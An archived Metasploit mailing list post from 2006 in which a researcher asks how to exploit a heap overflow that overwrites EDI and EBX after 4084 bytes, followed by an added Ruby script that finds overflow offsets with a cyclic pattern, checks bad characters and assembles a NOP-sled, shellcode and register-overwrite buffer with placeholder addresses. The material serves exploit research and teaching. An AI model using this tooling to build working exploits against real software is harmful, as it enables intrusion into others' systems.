Metasploit mailing list archives
EBX and EDI overwrite instead of EAX and EIP
From: Glinares at PCOnsite.com (Greg Linares)
Date: Mon, 23 Oct 2006 14:20:14 -0700
I might get flamed for this not being a specific Metasploit-related question, but once I get past this pain I plan on turning it into a Metasploit module. If this question upsets you, I apologize in advance.

Currently working on another buffer overflow, and it seems that after 4084 bytes I can overwrite EBX and EDI with values only:

[Buffer x 4084] [EDI overwrite value] [EBX overwrite value]

And after loading a JMP to EDI in the EBX register I can get EAX to point somewhere in the \x90 sled / buffer / \xcc cart. This is because this is a heap-based overflow, correct? (It's affecting a static local variable?)

So I am assuming I'll have to write something similar to this:

[\x90 Sled] [Shell Code] [EDI overwrite (JMP to EAX + Location of Shellcode)] [EBX overwrite (JMP to EDI)]

I am assuming this is an exploitable vector, but I could be wrong. Am I on the right path for this type of issue?

Greg Linares
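The post above finds the register overwrite "after 4084 bytes" and then sketches a payload layout. The usual way to pin those offsets down, and then to assemble the layout without miscounting, is a cyclic pattern plus a small payload builder. The following is an added, standalone Ruby example (not code from the post, and not Metasploit's own `Rex::Text.pattern_create` / `pattern_offset.rb`, although it uses the same `Aa0Aa1...` alphabet so offsets agree with those tools). It reimplements pattern creation and offset lookup, then builds the `[sled][shellcode][filler][EDI value][EBX value]` buffer the post describes. The buffer length 4084 and the `\xcc` "cart" come from the post; the addresses `0x10203040` and `0x50607080` are placeholders only and the bad-character set `\x00` is an assumption, since the post names neither a gadget address nor a protocol.

```ruby
# Added example: cyclic-pattern offset finding and payload assembly for an
# overflow that overwrites EDI and EBX after a fixed-size buffer.
# Not the poster's code and not Metasploit's Rex library; same alphabet as
# pattern_create.rb so offsets match that tool.

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes before any 3-byte chunk repeats

# Build "Aa0Aa1Aa2..." so that every 4-byte window is unique up to PATTERN_MAX.
def pattern_create(length)
  raise ArgumentError, "pattern longer than #{PATTERN_MAX} bytes repeats" if length > PATTERN_MAX
  out = "".b
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.bytesize >= length
      end
    end
  end
  out[0, length]
end

# value: the register contents as shown in the debugger (e.g. EDI = 0x41366141),
# or the raw 4-byte string. x86 is little-endian, so pack with 'V' to recover
# the bytes as they sat in memory. Returns the offset into the pattern, or nil.
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack('V') : value.b
  pattern.b.index(needle)
end

# Return [[offset, byte], ...] for every byte of data that is in badchars.
def find_badchars(data, badchars)
  bad = badchars.bytes
  data.bytes.each_with_index.select { |b, _| bad.include?(b) }.map { |b, i| [i, b] }
end

# Lay out: [\x90 sled][shellcode][filler to buf_len][EDI dword][EBX dword].
# edi/ebx are the 32-bit values that land in the two overwritten slots
# (the post's "JMP to EAX + location" and "JMP to EDI" values).
def build_payload(buf_len:, edi:, ebx:, shellcode:, sled_len: 64, badchars: "\x00".b)
  if sled_len + shellcode.bytesize > buf_len
    raise ArgumentError, "sled + shellcode (#{sled_len + shellcode.bytesize}) exceed the #{buf_len}-byte buffer"
  end
  tail = [edi].pack('V') + [ebx].pack('V')
  bad = find_badchars(tail, badchars)
  raise ArgumentError, "overwrite values contain bad chars at #{bad.inspect}" unless bad.empty?

  buf = ("\x90".b * sled_len) + shellcode.b
  buf << ("C".b * (buf_len - buf.bytesize))  # filler up to the overwrite point
  buf + tail
end

if __FILE__ == $0
  # Step 1: send a cyclic pattern, read EDI/EBX from the crash. Here the crash
  # is simulated by slicing the pattern at the offsets the post reports.
  pat = pattern_create(4100)
  edi_seen = pat[4084, 4].unpack1('V')   # what the debugger would show in EDI
  ebx_seen = pat[4088, 4].unpack1('V')
  puts "EDI 0x%08x -> offset %d" % [edi_seen, pattern_offset(pat, edi_seen)]
  puts "EBX 0x%08x -> offset %d" % [ebx_seen, pattern_offset(pat, ebx_seen)]

  # Step 2: assemble the real buffer. Addresses are placeholders (assumption).
  payload = build_payload(buf_len: 4084, edi: 0x10203040, ebx: 0x50607080,
                          shellcode: "\xcc".b * 32)
  puts "payload %d bytes, tail: %s" % [payload.bytesize, payload[-8, 8].unpack1('H*')]
end
```

The two values are packed with `'V'` (little-endian dword) because a register that reads `0x41366141` in the debugger was filled from the bytes `"Aa6A"` in memory; feeding the debugger value straight into `pattern_offset` handles that conversion. The builder refuses to emit an address containing a bad character, which is the check that usually bites once the layout itself is right.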
Current thread:
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)